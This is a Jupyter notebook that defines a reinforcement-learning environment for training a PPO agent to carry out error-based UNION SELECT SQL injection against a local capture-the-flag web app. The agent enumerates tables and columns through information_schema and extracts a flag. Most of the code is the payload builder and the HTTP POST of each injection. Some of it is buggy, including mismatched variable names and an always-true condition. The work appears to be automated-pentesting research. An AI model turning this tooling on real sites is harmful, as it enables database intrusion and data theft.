In [ ]:
import gym
from gym import spaces
import numpy as np
import numpy as np
import gym
from xmlrpc.client import ResponseError
import numpy as np
import gym
from gym import Env
from gym import spaces 
from gym.spaces import Discrete, Box
import requests
import random
import re
import stable_baselines3
import time 

from time import sleep
from stable_baselines3.common.env_checker import check_env
from stable_baselines3 import A2C, DQN, PPO

In [ ]:
flag_found=[]

actionDictionary = {
    
    "0": "change Escape1",
    "1": "change Escape2",
    "2": "change Comment1",
    "3": "change Comment2",
    "4": "change Comment3",
    "5": "enumerate Tables",
    "6": "add Column",
    "7": "change Tables",
    "8": "find Columns",
    "9": "try Columns"
    
}

In [ ]:
# Positive rewards

tableFoundReward = 1
columnFoundReward = 5
tableAndColumnReward = 5
changingTable = 10
flagFound = 100

# Negative rewards

outofBoundsReward = -100
outofActionsReward = -10
invalidAction = -5
pointlessAction = -1



In [ ]:
# Generate the information_schema.TABLES default info

information_schema_default_tables = ("innodb_table_stats", "mysql", "information_schema", "performance_schema", "sys")
information_schema_columns = "information_schemaColumns.txt"

# Needs renaming to default tables from information schema
information_schema_default_columns = []

f = open(information_schema_columns)

for _ in f:
    _ = _.replace("\n","")
    information_schema_default_columns.append(_)

In [ ]:
class SQLiEnv(gym.Env):
    def __init__(self):
        self.url = "http://localhost:8000/index.php" # This is the URL for the web application.   
        self.header = {'User-Agent': 'Mozilla/5.0, RL-CTF'} # A default header for interacting with web forms
        self.interaction_form_name = "email" # This is the hard coded vulnerable HTML form input
        """
            The action space is made of the following discrete actions
            # Action 0: changeEscape1
            # Action 1: changeEscape2
            # Action 2: changeComment1
            # Action 3: changeComment2
            # Action 4: changecomment3
            # Action 5: findTables
            # Action 6: addColumn
            # Action 7: changeTables
            # Action 8: findColumns
            # Action 9: tryColumns
        """
        self.action_space = spaces.Discrete(10)  # See above for abstract 
        
        """
            The observation space is an array with the following assumptions:
            Has SQL Injection been found: Boolean
            Has an Error occured: Boolean 
            Has the correct escape character been found: ', or ", or Not Found
            Has the comment been found: # c, -- c, /* c, or Not Found
            How many columns used: maximum of 20
            Have the tables been found: Yes, No
            Have the columns been found: Yes, No
            Has the flag been found: Yes or No
            Has the challenge been completed: Yes or No
            Did we go out of bounds - too many columns: Yes or No
            What were the last 5 actions? - 5
            
            We can add more as we see fit
                   
        """
        done = False
        self.observation_space = spaces.Box(low=0, high=1, shape=(41,), dtype=np.float32)
        self.reset()
        
        self.numberOfActionsTotal = 0
        
        self.log = ''
        
    def reset(self):
        self.sqlStatement = ""
        self.payload = ""
        self.unionStatement = "UNION ALL SELECT"
        self.nullStatement = ""
        self.columnStatement = ""
        self.escapeStatement = ""
        self.commentStatement = ""
        self.tableStatement = ""
        self.tables = [""]
        
        self.enumerateColumns = ""
        self.tryColumns = ""
        
        self.columns = [""]
        self.HTMLRESPONSE = [""]
        self.outofBounds = False
        self.outofActions = False
        self.sqlInjectionFound = False
        
        self.tableUsed = 0
        self.tableChosen = self.tables[self.tableUsed]
        #self.columnChecker = self._find_columns()
        
        self.columnsFound = False
        self.tablesFound = False
        self.flagFound = False
        
        self.columnDict = {}
        
        
        
        self.columnsUsed = 0
        self.tablesFound = 0
        self.totalActions = 100
        self.maxColumns = 3
        
        
        self.index = 0
        self.actionHistory = [0] * 5
        self.observationIndex = 31 # For the previous action history
        
        
        self.log = ''
        
        print("Resetting \n")
        
        return self._get_obs()
    
    def step(self, action):
        current_state = self._get_obs() # Debugging for current state before being updated
        previous_columns = self.tryColumns
        previous_payload = self.payload
        
        self.columnsUsed = self.payload.count("CONCAT")
        
        #print("Previous Payload", self.payload)
        
        historicPayloadCheck = None
        
        print("Columns Used at start - ", self.columnsUsed)
        
        self.numberOfActionsTotal +=1 # Debugging for how many actions were taken overall to find a flag
        
        self.totalActions -=1
        done = False 
        reward = 0
        
        self.tableChosen = self.tables[self.tableUsed]
        
        if action == 0: # Change escape 
            self.escape_statement = self._changeEscape1()
            
        if action == 1: # Change escape
            self.escape_statement = self._changeEscape1()
            
        if action == 2: # Change comment
            self.commentStatement = " -- c"
            
        if action == 3: # Change comment
            self.commentStatement = " -- c"
            
        if action ==4: # Change comment
            self.commentStatement = " -- c"
            
        if action == 5: # Enumerate table values
            
            self.columnsUsed = self.payload.count("CONCAT")
            
            x = self._add_column(action)
            self.nullStatement = x[0]
            
            if self.columnsUsed == 0:
                #self.columnsUsed +=1
                enumerateTables = ' CONCAT("##", table_name, "##")  '
                
            else:
                enumerateTables = ' CONCAT("##", table_name, "##") '
                
            if 'CONCAT("NULL")' in self.nullStatement and enumerateTables not in self.nullStatement:
                self.nullStatement = self.nullStatement.replace('CONCAT("NULL")', enumerateTables, 1)
                
            else:
                self.nullStatement = enumerateTables
                
            #self.columnsUsed = self.payload.count("CONCAT")
                
            #print("Columns used continued - ", self.columnsUsed)
            
            
            
                
                
            self.tableStatement = " from information_schema.tables "
            
            
        if action == 6: # add column values
            
            self.columnsUsed = self.payload.count("CONCAT")
            
            if self.tablesFound == True: # Negative reward if we have already found this 
                reward = invalidAction
                #print("Why add more columns")
                done = True
            
            x = self._add_column(action)
            self.nullStatement = x[0]
            
        if action == 7: # change to different table via the sql statement
            
            
            if len(self.tables) == 1:
                #print("Cant change tables, none exist")
                reward = invalidAction
            
            
            elif not (self.tableUsed + 1) >= len(self.tables):
                #print("Changing Tables")
                self.tableChosen = self.tables[self.tableUsed]
                #print("The previous table is ", self.tableChosen)
                self.tableUsed +=1
                self.tableChosen = self.tables[self.tableUsed]
                #print("The new table is ", self.tableChosen)
                self.tableStatement = ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)  
        
        
        if action == 8: # Enumerate column values
            
            self.columnsUsed = self.payload.count("CONCAT")
            if len(self.tables) == 1:
                #print("TABLES NOT AVAILABLE")
                reward = invalidAction
            
            else:
                
                
                x = self._add_column(action)
                self.nullStatement = x[0]
                
                if self.columnsUsed == 0:
                    #self.columnsUsed +=1
                    enumerateColumns = ' CONCAT("&&", column_name, "&&", table_name) '
                    
                    
                else:
                    enumerateColumns = ' CONCAT("&&", column_name, "&&", table_name)'
                    
                if 'CONCAT("NULL")' in self.nullStatement and enumerateColumns not in self.nullStatement:
                        self.nullStatement = self.nullStatement.replace('CONCAT("NULL")', enumerateColumns, 1)
                
                else:
                    self.nullStatement = enumerateColumns
                    
                #self.columnsUsed = self.payload.count("CONCAT")
            
                self.tableStatement = ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
        
        if action == 9: # Try column values
            
            
            if len(self.columns) == 1:
                print("Columns not available")
                reward = invalidAction
                
            else:
                
                self.nullStatement = ""
                self.columnsUsed = self.payload.count("CONCAT")
                
                print("Trying columns")
                x = self._add_column(action)
                self.nullStatement = x[0]
                
                self.tryColumns = " CONCAT({})".format(str(self.columnDict[self.tables[self.tableUsed]]).replace("[","").replace("]","").replace("'",""))
                
            if 'CONCAT("NULL")' in self.nullStatement and self.tryColumns != previous_columns:
                self.nullStatement = self.nullStatement.replace('CONCAT("NULL")', self.tryColumns, 1)
                
                self.tableStatement = " FROM {}".format(self.tableChosen)
                
            else:
                
                self.nullStatement = self.tryColumns
                
            #self.columnsUsed = self.payload.count("CONCAT")
            
                self.tableStatement = " FROM {}".format(self.tableChosen)
                
                    
        
           # if len(self.columns) >1:
                
            #    foundColumns = str(self.columns)
                #self.columnStatement = "CONCAT ({}) ".format(foundColumns.replace("'","").replace("[","").replace("]",""))
                
                #print("Statement before trying to add column values", self.payload)
            #    if self.columnsUsed == 0:
            #        self.columnsUsed +=1
            #        tryColumns = " CONCAT({})".format(str(self.columnDict[self.tables[self.tableUsed]]).replace("[","").replace("]","").replace("'",""))
            #    else:
            #        tryColumns= " CONCAT({})".format(str(self.columnDict[self.tables[self.tableUsed]]).replace("[","").replace("]","").replace("'",""))
                
            #    self.tableStatement = " FROM {}".format(self.tableChosen)
                
                #print("statement after trying to add column values", self.payload)

           #     print("COLUMNS I am trying based on what I found: ", self.columnStatement, self.tableStatement)            
       
        # Formatting stuff
        
        #if "table_name" or "column_name" in self.payload:
        #    if self.payload != previous_payload:
        #        self.columnsUsed = self.columnsUsed +1
            
        print("Columns Used After Action - ", self.columnsUsed)
        self.payload = "{} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.nullStatement, self.tableStatement, self.commentStatement)        

        
        ### Posting the exploit
        self.exploit = {"email":"{}".format(self.payload)}
        self.HTMLRESPONSE = self._POST(self.exploit)
    
        checker = self._find_tables() # Run the find_tables function to observe if we have found any tables of interest
        columnChecker = self._find_columns() # Run the find_columns function to observe if we have found any columns of interest
        
        normalisedAction = self._normalize(action)
        addActionHistory = self._addActionHistory(normalisedAction)
        
        if "Error" in self.HTMLRESPONSE[0]:
            self.sqlInjectionFound = True
        
        # Rewards 
        
        # action 5 = table action 8 = columns action 7 = change table
        
        if self.tablesFound == True:
            reward = tableFoundReward
            
            #print("Tables found - ", self.tables)
            
        if self.columnsFound == True:
            reward = columnFoundReward
            
           # print("Columns found - ", self.columns)
        
        if current_state[29] == 1: # if tables found
            if action == 5:
                #print("Strange", current_state[29], action, self.columnsFound)
                reward = pointlessAction
                #print("Pointless Action - ", actionDictionary[str(action)])
                
        if current_state[30] == 1: # if columns found
            #print("COLUMNS FOUND OBS IS TRUE", current_state[30])
            if action == 8:
                reward = pointlessAction
              #  print("Pointless Action - ", actionDictionary[str(action)])
        
        # Punish for pointless action
        if self.tablesFound == True:
            if self.columnsFound == True:
                if action == 5 or 8 or 0 or 1 or 2 or 3 or 4:
                    reward = pointlessAction
                    
        # Encourage changing table
        if self.columnsFound == True:
            if self.tablesFound == True:
                if self.flagFound == False:
                    if action == 7:
                        reward = 6
                    if action == 8:
                        reward = changingTable
                        
                    if action == 9:
                        reward = changingTable
                        
        if "RL{1234}" in self.HTMLRESPONSE[0]:
            print("###### !FLAG! #####")
            print("\n")
            print("I HAVE FOUND THE FLAG :)")
            reward = 100
            
            self.sqlInjectionFound = True
            self.flagFound = True
            
            flagFoundInfo = "{}".format(self.numberOfActionsTotal, self.totalActions)
            
            flags_found.append(flagFoundInfo)
            done = True
                        
                        
            
            
        """
        # Termination values for out of bounds
        
        
        """
        
        if self.columnsUsed == self.maxColumns: # Terminate episode if we go out of bounds of our maximum column value
            #print("Ending Early")
            
            self.outofBounds = True
           
            reward = outofBoundsReward
            #end_observation = self._get_obs()
            done = True
            
        if self.totalActions == 0:
            #print("Out of Actions")
            
            self.outofActions = True
            reward = outofActionsReward
            
            #end_observation = self._get_obs()
            done = True
            
        print("Reward: ", reward, "Action chosen: ", action, actionDictionary[str(action)], "Payload: ", self.payload, "\n")
        #print("Current state: ", self._get_obs())
        return self._get_obs(), reward, done, {}
            
    def _changeEscape1(self):
        self.escapeStatement = "' "
        
        return self.escapeStatement
    
    def _changeEscape2(self):
        self.escapeStatement = '" '
      
        return self.escapeStatement
    
    def _changeComment1(self):
        pass
    
    def _add_column(self, action):
        
        
        if action == 6: # If we specify add column action then we do the following
            
            print("This is a test")
            if self.columnsUsed == 0:
                self.nullStatement = 'CONCAT("NULL") '
                self.columnsUsed +=1

            else:
                self.columnsUsed +=1
                
                #if "table_name" or "column_name" in self.nullStatement:
                #    self.columnsUsed = self.columnsUsed -1
                
                self.nullStatement = ',CONCAT("NULL") ' * self.columnsUsed
                self.nullStatement = self.nullStatement[1:]
                
        if action != 6: # otherwise just add columns based on current value
            if self.columnsUsed == 0:
                    self.nullStatement = 'CONCAT("NULL") '
                    #self.columnsUsed +=1

            else:
                #self.columnsUsed +=1
                self.nullStatement = ',CONCAT("NULL") ' * self.columnsUsed
                self.nullStatement = self.nullStatement[1:]
            
            
        return self.nullStatement, self.columnsUsed
    
    def _find_columns(self):
        
        self.columnsFoundCheck = self.HTMLRESPONSE[0].count("&&")
        
        print("COLUMNS CHECK DEBUG", self.columnsFoundCheck)
        
        if self.columnsFoundCheck >2 and "Error Message: The used SELECT" not in self.HTMLRESPONSE[0] and "You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]:
            self.columnsFound = True
            print("Columns Found")
            
            columnString = re.findall("&&(.*?)&&", self.HTMLRESPONSE[0])
            
            columnDictKey = self.tables[self.tableUsed]
            columnDictValues = []
            
            for columnName in columnString:
                if columnName == "":
                    pass
                
                elif "column_name" in columnName:
                    pass
                
                elif "table_name" in columnName:
                    pass
                
                else:
                    
                    
                    if columnName not in self.tables:
                        
                        columnDictValues.append(columnName)
                    
                        if columnName not in self.columns:
                            self.columns.append(columnName)

                        if columnDictKey in self.columnDict:
                            self.columnDict[columnDictKey] = columnDictValues
                            
        return self.columnsFound, self._get_obs()
    
    def _find_tables(self):
        
        #print("Begin finding tables function")
        self.tablesFoundCheck = self.HTMLRESPONSE[0].count("##")
        
        if self.tablesFoundCheck >2 and "Error Message: The used SELECT" not in self.HTMLRESPONSE[0] and "You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]: 
            print("Tables Found")
            self.tablesFound = True
            
            tableString = re.findall("##(.*?)##", self.HTMLRESPONSE[0])
            
            for tableName in tableString:
                if tableName == "":
                    pass
                
                elif "table_name" in tableName:
                    pass 
                
                elif "column_name" in tableName:
                    pass
                
                else:
                
                    if tableName not in information_schema_default_columns:
                        if tableName not in self.tables:
                            if "" in self.tables:
                                self.tables.remove("")
                            if None in self.tables:
                                self.tables.remove(None)
                            self.tables.append(tableName)
                            
                            if tableName not in self.columnDict:
                                self.columnDict[tableName] = []
                            
            #print("The current tables: ", self.tables)
        
            #print("TABLE STRING", tableString)
            #print("LIST OF FOUND TABLES", self.tables)
            
            
        return self.tablesFound, self._get_obs()
    
    def _GET(self):
        try:
            # GET request using the url and custom header
            response = requests.get(self.url, headers=self.header)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e

    # This function is for the HTTP POST requests for submitting our SQL injection payloads
    def _POST(self, exploit):
        try:
            # Send the url, header and data containing the payload. This is found in the custom environment
            # Search for "exploit" in the custom environment to find this part 
            response = requests.post(self.url, headers=self.header, data=exploit)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e 

    # We can use this to change the challenge on the home page when the environment resets.
    # I currently havent coded it into the environment since its a proof of concept for error based UNION SELECT 
    def _ChangeChallenge(challenge):
        print(challenge)
        try:
            response = requests.get(challenge, headers=header)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e


    def _normalize(self, chosenAction):
        max_val = 10
        normalized_values = chosenAction / max_val
        #print("ORIGINAL", chosenAction, "NORMALISED", normalized_values)
        return normalized_values

    # Function to add items to the list and maintain its size at 10
    def _addActionHistory(self, chosenAction):
        self.actionHistory[self.index] = chosenAction
        #self.index = (self.index + 1) % 10  # Update index in a circular manner
        new_item = _
        self.index +=1
        
        if self.index == 5:
            self.index = 0
            
    def _get_obs(self):
        obs = np.zeros(41)
        
        if self.sqlInjectionFound == True: # If SQL injection is found based on a returned website response
            obs[0] = 1
            
        if self.escapeStatement == "":
            obs[1] = 1
        
        if self.escapeStatement == "' ":
            obs[2] = 1
            
        if self.escapeStatement == '" ':
            obs[3] = 1
            
        if self.commentStatement == "":
            obs[4] = 1
            
        if self.commentStatement == " -- c":
            obs[5] = 1
            
        if self.commentStatement == " # c":
            obs[6] = 1
            
        if self.commentStatement == " /* c":
            obs[7] = 1
        
        if self.tablesFound == True: 
            obs[29] = 1
            
        if self.columnsFound == True:
            obs[30] = 1
             
        if self.outofBounds == True:
            obs[37] = 1
            
        if self.outofActions == True:
            obs[38] = 1
        
        if self.flagFound == True:
            obs[39] = 1
            
        obs[40] = (self.tableUsed / 10)
            
        
        obs[8 + self.columnsUsed] = 1 # Which column used value in the array. For example if none then index 8 = 1
        
        for _ in self.actionHistory:
            #print("Observation Index", self.observationIndex)
            obs[self.observationIndex] = _
            self.observationIndex +=1
        
        # Reset actionhistory index to 30 after populating 
        self.observationIndex = 31
            
        return obs
            
    def render(self, mode=None):
        print(self.log)
        self.log = ''


In [ ]:
from stable_baselines3.common.env_checker import check_env

env.reset()

env = SQLiEnv()

check_env(env, warn=True)




In [ ]:
env.reset()

model = PPO("MlpPolicy", env, verbose=1)
model.learn(total_timesteps=100000)